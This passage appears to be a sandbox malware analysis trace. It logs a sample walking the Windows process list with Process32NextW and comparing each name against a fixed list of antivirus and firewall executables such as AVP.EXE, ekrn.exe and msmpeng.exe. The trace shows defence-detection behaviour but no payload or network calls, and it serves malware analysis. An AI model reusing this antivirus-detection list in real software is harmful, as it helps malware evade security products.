lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="smc.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="persfw.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="pccpfw.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="cfp.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="msmpeng.exe", lpString2="wininit.exe") returned -1 [0036.135] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.138] GetLastError () returned 0xcb [0036.138] lstrcmpiW (lpString1="AVP.EXE", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="ekrn.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="avgnt.exe", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="ashDisp.exe", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="Mcshield.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="avengine.exe", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="cmdagent.exe", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="smc.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="persfw.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="pccpfw.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="csrss.exe") returned 1 [0036.138] lstrcmpiW (lpString1="cfp.exe", lpString2="csrss.exe") returned -1 [0036.138] lstrcmpiW (lpString1="msmpeng.exe", lpString2="csrss.exe") returned 1 [0036.138] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.139] GetLastError () returned 0xcb [0036.139] lstrcmpiW (lpString1="AVP.EXE", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="ekrn.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="avgnt.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="ashDisp.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="Mcshield.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="avengine.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="cmdagent.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="smc.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="persfw.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="pccpfw.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="cfp.exe", lpString2="winlogon.exe") returned -1 [0036.139] lstrcmpiW (lpString1="msmpeng.exe", lpString2="winlogon.exe") returned -1 [0036.139] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.140] GetLastError () returned 0xcb [0036.140] lstrcmpiW (lpString1="AVP.EXE", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="ekrn.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="avgnt.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="ashDisp.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="Mcshield.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="avengine.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="cmdagent.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="smc.exe", lpString2="services.exe") returned 1 [0036.140] lstrcmpiW (lpString1="persfw.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="pccpfw.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="cfp.exe", lpString2="services.exe") returned -1 [0036.140] lstrcmpiW (lpString1="msmpeng.exe", lpString2="services.exe") returned -1 [0036.140] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.141] GetLastError () returned 0xcb [0036.141] lstrcmpiW (lpString1="AVP.EXE", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="ekrn.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="avgnt.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="ashDisp.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="lsass.exe") returned 1 [0036.141] lstrcmpiW (lpString1="Mcshield.exe", lpString2="lsass.exe") returned 1 [0036.141] lstrcmpiW (lpString1="avengine.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="cmdagent.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="smc.exe", lpString2="lsass.exe") returned 1 [0036.141] lstrcmpiW (lpString1="persfw.exe", lpString2="lsass.exe") returned 1 [0036.141] lstrcmpiW (lpString1="pccpfw.exe", lpString2="lsass.exe") returned 1 [0036.141] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="cfp.exe", lpString2="lsass.exe") returned -1 [0036.141] lstrcmpiW (lpString1="msmpeng.exe", lpString2="lsass.exe") returned 1 [0036.141] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.142] GetLastError () returned 0xcb [0036.142] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.142] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.142] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.143] GetLastError () returned 0xcb [0036.143] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.143] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.143] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.144] GetLastError () returned 0xcb [0036.144] lstrcmpiW (lpString1="AVP.EXE", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="ekrn.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="avgnt.exe", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="ashDisp.exe", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="Mcshield.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="avengine.exe", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="cmdagent.exe", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="smc.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="persfw.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="pccpfw.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="dwm.exe") returned 1 [0036.144] lstrcmpiW (lpString1="cfp.exe", lpString2="dwm.exe") returned -1 [0036.144] lstrcmpiW (lpString1="msmpeng.exe", lpString2="dwm.exe") returned 1 [0036.144] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.145] GetLastError () returned 0xcb [0036.145] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.145] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.145] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.146] GetLastError () returned 0xcb [0036.146] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.146] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.146] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.147] GetLastError () returned 0xcb [0036.147] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.147] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.147] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.148] GetLastError () returned 0xcb [0036.148] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.148] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.148] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.149] GetLastError () returned 0xcb [0036.149] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="cfp.exe", lpString2="svchost.exe") returned -1 [0036.149] lstrcmpiW (lpString1="msmpeng.exe", lpString2="svchost.exe") returned -1 [0036.149] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.150] GetLastError () returned 0xcb [0036.150] lstrcmpiW (lpString1="AVP.EXE", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="ekrn.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="avgnt.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="ashDisp.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="Mcshield.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="avengine.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="cmdagent.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="smc.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="persfw.exe", lpString2="svchost.exe") returned -1 [0036.150] lstrcmpiW (lpString1="pccpfw.exe", lpString2="svchost.exe") returned -1 [0036.150] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.151] GetLastError () returned 0xcb [0036.151] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.151] GetLastError () returned 0xcb [0036.151] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.152] GetLastError () returned 0xcb [0036.152] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0036.152] GetLastError () returned 0xcb [0036.152] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.153] GetLastError () returned 0xcb [0036.153] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0036.154] GetLastError () returned 0xcb [0036.154] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0036.155] GetLastError () returned 0xcb [0036.155] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.155] GetLastError () returned 0xcb [0036.155] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0036.156] GetLastError () returned 0xcb [0036.156] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0036.156] GetLastError () returned 0xcb [0036.157] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0036.157] GetLastError () returned 0xcb [0036.157] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x378, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0036.158] GetLastError () returned 0xcb [0036.158] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x378, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0036.158] GetLastError () returned 0xcb [0036.158] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xb64, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.159] GetLastError () returned 0xcb [0036.159] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beds-rice-judgment-op.exe")) returned 1 [0036.160] GetLastError () returned 0xcb [0036.160] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="seanusingreceiverlegislature.exe")) returned 1 [0036.160] GetLastError () returned 0xcb [0036.160] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="textile_shadow_advantages.exe")) returned 1 [0036.161] GetLastError () returned 0xcb [0036.161] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="halo.exe")) returned 1 [0036.161] GetLastError () returned 0xcb [0036.161] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="habitat norman cognitive.exe")) returned 1 [0036.162] GetLastError () returned 0xcb [0036.162] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mars_shortly_joins_spell.exe")) returned 1 